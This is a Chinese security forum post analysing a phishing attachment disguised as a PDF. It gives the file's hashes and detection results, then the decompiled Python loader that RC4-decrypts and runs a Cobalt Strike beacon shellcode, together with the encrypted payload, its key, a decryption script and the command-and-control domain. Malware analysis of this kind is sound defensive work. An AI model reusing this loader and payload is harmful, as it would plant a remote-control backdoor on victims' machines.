用户
搜索
  • TA的每日心情
    无聊
    2021-4-29 17:54
  • 签到天数: 66 天

    连续签到: 1 天

    [LV.6]常住居民II

    超级版主

    培训/业务/联系Q547006660

    Rank: 8Rank: 8

    68

    主题

    229

    帖子

    1104

    魔法币
    收听
    0
    粉丝
    74
    注册时间
    2017-1-18

    秦春秋文阁春秋游侠核心白帽i春秋签约作者幽默灌水王积极活跃奖白帽高手白帽传说

    J0o1ey 超级版主 培训/业务/联系Q547006660 秦 春秋文阁 春秋游侠 核心白帽 i春秋签约作者 幽默灌水王 积极活跃奖 白帽高手 楼主
    发表于 2021-5-27 00:16:39 02147

    0x01 邮件原文与样本

    hw期间内部邮箱网关收到了钓鱼邮件

    邮件原文如下

    img

    img

    解压后得到样本

    财险内部旅游套餐方案.pdf.exe

    样本为大小为5.88M,HASH如下

    MD5

    5bc32973b43593207626c0588fc6247e

    SHA-1

    551414cb283a56cf55817c720c2efee0144ea2ed

    SHA-256

    d12e852eeefa87e75c7876fb53947b979bfbf880eb825eb58b9fe7f0132809ad

    VT报毒 14/69,免杀效果尚可

    image-20210527000748519

    image-20210527000825186

    通过Yara规则检测,为典型的Cobaltstrike x64 https beacon载荷

    image-20210527001209833

    基于程序体积和逆向后获取到的函数判断,该恶意样本为Python编写的shellcodeloader来加载CS https beacon X64 shellcode,后用py2exe程序进行封装

    img

    对该程序进行逆向unpy2exe逆向分析,取得其源码

    \# uncompyle6 version 3.7.4
    \# Python bytecode 3.7
    \# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
    \# Embedded file name: py36test.py
    
    import ctypes, urllib, base64, requests, hashlib
    
    def shellCodeLoad(shellcode):
      ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
      ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(12288), ctypes.c_int(64))
      buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
      eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=='))
      handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
      ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
    
    def rc4(text, key):
      key = hashlib.md5(key).hexdigest()
      text = base64.b64decode(text)
      result = ''
      key_len = len(key)
      box = list(range(256))
      j = 0
      for i in range(256):
         j = (j + box[i] + ord(key[(i % key_len)])) % 256
         box[i], box[j] = box[j], box[i]
      i = j = 0
    
      for element in text:
         i = (i + 1) % 256
         j = (j + box[i]) % 256
         box[i], box[j] = box[j], box[i]
         k = chr(element ^ box[((box + box[j]) % 256)])
         result += k
      return result
    
    if __name__ == '__main__':
      b = '24LfU140d71x8NG78Y79RFNXRJanRORJMeYHYusdrdthA5ze2q9sx7gEZUtrpysR9EkzxP5sNbhA9sHY2QCJ014rV3Ynumbfg1mGe87M/kmlAbd93FC0v13PI+mBOiDE5Plt9wqib1srOudHMS6PY79V14jwaF5RTo5Q76FcuYAg5vWyjU4wmquSknlf3DaN0/YpOuCn+qLiP8AlCYyy1j/8WzgVW87NdyzEO2HP5HZWfi0BiRXk8qopN8qMZjmltuE/FfgSza412HwM6d5vU7wuki4R5w3e2dzBSCQ6HSmSXc/rjKPLwkXhnKblzauanHQQUprU43eJ6A3FMLPyBwUUmXiE84r0pD0sR/YNBpI+xpayWRa/3hnWWaYAZNhZ5I82v2gUK1P0IQyXyLBHjGQejFptrZQE+5t2mJgOaIv+kgilCdHR7UsIyS3CDLlzX/241f6fmTUCTXon68Gey0bx3BYdMjIwpdCqxBBqJxyFNNqNhPYgQGWUZ1/GcGK4IN3+zFbS/Q+X8QQW2n9+r/lW/BAFF9bZbQTGPtt9GPfQNRObgy+ucbRkS/Ln+TZpxTtzW8pPmUdMtW1/tq1BHsnexwnRzyJeTEbTTOyvxj+uG0KGLfXMX9UbAnNHkNyhs/uPEKvB7Wv98FHmS8F0fokZQCBrv4xwE1b0fsBiq51t+i8ls+dfTyhdAC9tkkQS1j5HnSXiF4SP/ew3dISqoLp6gds6r+XhT1aLMQXmlnx8f7s+eUw9pydXiG5VmBjV8d/2AGsMuh7ZLTssXi5bgSL/U5S9D/dYt2U0O3O+UhmUE78PPn5aHX+ogmuXesn5AfnItZ7F66/cneKwcsdnUqKtWiW0SVHd75QTU+bnlIEgCE9iTqy2MZDPCeqGawxz28H3RGnCivK/48+7jPHEgNMmV7X5FFtnCSnuwDhyDSr6aIT82Ct8k7hoDuOSaPl00gTI2tT5NlhOt+4xepya0zyK/Os3R+P0tobg0hiSt6PhC6RiphkzC8mt+1a1ATqLnIoC7aw0I/eGDacgBXUwhSDNOK52fq3GnUZoTBOfWdHXs67qF2tQ2qEipNcI29gict6kZIwgwut6sK8F5R+njGdtUxeidh9g7tphQYOifvFzzQ5p78h2HSB6g/yETLZksR7xIOKYKILm5IkaU0jM+qI9IKh9+gjJXBcHPtGgmzDzFLdM2ObDr2vDFRDVylXVfUaGnZ4KmCN4Sn60WRSgH2SMjbL11wKPQ3H0dDZ7AsIDgskmaZa1f/02JYdiVAJF2379mpEQa/M89YpDEBVzlJRb8ikw3ON9PnH3zw4cvvs3uLjpfrV3zi5CPgCIa9u0DlE8aEsuLtFPszJA/Q+pQJTgHk1mt33MpQzDo/zCRAsCQ7/SjCa8ETECbvXrrOrC6gsEBrmTeRGzGOS2fxsxc2FB585NZXKHNWrwg6IS4myDWjTKUMy9GWyy8zd9hxvXyzNLKfZANZ2wnlSgpzYVb8Aj8Ln6cxCk+VKXh7zWc7JA+mD6GT2d9Y/n3a1RKgEYi/gtpwAPAWxhCiZsBeqfgtX9MFtv8AR/YU3g8VwRLswsJUo8iHwx9/RHtUGvkczLnphkQpJmuyVHb+stPkZc82wiUw63SX8va2mAnHcoOVW1di9HLQHwxKHKVPQ='
      mm = 'king6666'
      c = rc4(b, mm.encode('utf-8'))
      code = bytearray(base64.b64decode(c))
      shellCodeLoad(code)

    分析得出该恶意样本是通过rc4算法解密base64加密的shellcode

    并且使用VirtualAlloc开辟内存空间放入内存中执行

    编写解密脚本

    import ctypes, urllib, base64, requests, hashlib
    
    def rc4(text, key):
      key = hashlib.md5(key).hexdigest()
      text = base64.b64decode(text)
      result = ''
      key_len = len(key)
      box = list(range(256))
      j = 0
      for i in range(256):
         j = (j + box[i] + ord(key[(i % key_len)])) % 256
         box[i], box[j] = box[j], box[i]
      i = j = 0
      for element in text:
         i = (i + 1) % 256
         j = (j + box[i]) % 256
         box[i], box[j] = box[j], box[i]
         k = chr(element ^ box[((box + box[j]) % 256)])
         result += k
      return result
    
    b = '24LfU140d71x8NG78Y79RFNXRJanRORJMeYHYusdrdthA5ze2q9sx7gEZUtrpysR9EkzxP5sNbhA9sHY2QCJ014rV3Ynumbfg1mGe87M/kmlAbd93FC0v13PI+mBOiDE5Plt9wqib1srOudHMS6PY79V14jwaF5RTo5Q76FcuYAg5vWyjU4wmquSknlf3DaN0/YpOuCn+qLiP8AlCYyy1j/8WzgVW87NdyzEO2HP5HZWfi0BiRXk8qopN8qMZjmltuE/FfgSza412HwM6d5vU7wuki4R5w3e2dzBSCQ6HSmSXc/rjKPLwkXhnKblzauanHQQUprU43eJ6A3FMLPyBwUUmXiE84r0pD0sR/YNBpI+xpayWRa/3hnWWaYAZNhZ5I82v2gUK1P0IQyXyLBHjGQejFptrZQE+5t2mJgOaIv+kgilCdHR7UsIyS3CDLlzX/241f6fmTUCTXon68Gey0bx3BYdMjIwpdCqxBBqJxyFNNqNhPYgQGWUZ1/GcGK4IN3+zFbS/Q+X8QQW2n9+r/lW/BAFF9bZbQTGPtt9GPfQNRObgy+ucbRkS/Ln+TZpxTtzW8pPmUdMtW1/tq1BHsnexwnRzyJeTEbTTOyvxj+uG0KGLfXMX9UbAnNHkNyhs/uPEKvB7Wv98FHmS8F0fokZQCBrv4xwE1b0fsBiq51t+i8ls+dfTyhdAC9tkkQS1j5HnSXiF4SP/ew3dISqoLp6gds6r+XhT1aLMQXmlnx8f7s+eUw9pydXiG5VmBjV8d/2AGsMuh7ZLTssXi5bgSL/U5S9D/dYt2U0O3O+UhmUE78PPn5aHX+ogmuXesn5AfnItZ7F66/cneKwcsdnUqKtWiW0SVHd75QTU+bnlIEgCE9iTqy2MZDPCeqGawxz28H3RGnCivK/48+7jPHEgNMmV7X5FFtnCSnuwDhyDSr6aIT82Ct8k7hoDuOSaPl00gTI2tT5NlhOt+4xepya0zyK/Os3R+P0tobg0hiSt6PhC6RiphkzC8mt+1a1ATqLnIoC7aw0I/eGDacgBXUwhSDNOK52fq3GnUZoTBOfWdHXs67qF2tQ2qEipNcI29gict6kZIwgwut6sK8F5R+njGdtUxeidh9g7tphQYOifvFzzQ5p78h2HSB6g/yETLZksR7xIOKYKILm5IkaU0jM+qI9IKh9+gjJXBcHPtGgmzDzFLdM2ObDr2vDFRDVylXVfUaGnZ4KmCN4Sn60WRSgH2SMjbL11wKPQ3H0dDZ7AsIDgskmaZa1f/02JYdiVAJF2379mpEQa/M89YpDEBVzlJRb8ikw3ON9PnH3zw4cvvs3uLjpfrV3zi5CPgCIa9u0DlE8aEsuLtFPszJA/Q+pQJTgHk1mt33MpQzDo/zCRAsCQ7/SjCa8ETECbvXrrOrC6gsEBrmTeRGzGOS2fxsxc2FB585NZXKHNWrwg6IS4myDWjTKUMy9GWyy8zd9hxvXyzNLKfZANZ2wnlSgpzYVb8Aj8Ln6cxCk+VKXh7zWc7JA+mD6GT2d9Y/n3a1RKgEYi/gtpwAPAWxhCiZsBeqfgtX9MFtv8AR/YU3g8VwRLswsJUo8iHwx9/RHtUGvkczLnphkQpJmuyVHb+stPkZc82wiUw63SX8va2mAnHcoOVW1di9HLQHwxKHKVPQ='
    mm = 'king6666'
    c = rc4(b, mm.encode('utf-8'))
    code = bytearray(base64.b64decode(c))
    print(code)

    得到其shellcode

    image-20210527000602086

    回连地址为www.alibababaa.com

    为典型的cobaltstrike https x64 beacon shellcode

    至此,分析结束

    有培训需求或是技术交流需求的朋友可以联系我~QQ547006660|交流群820783253|团队首页www.gcowsec.com|
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册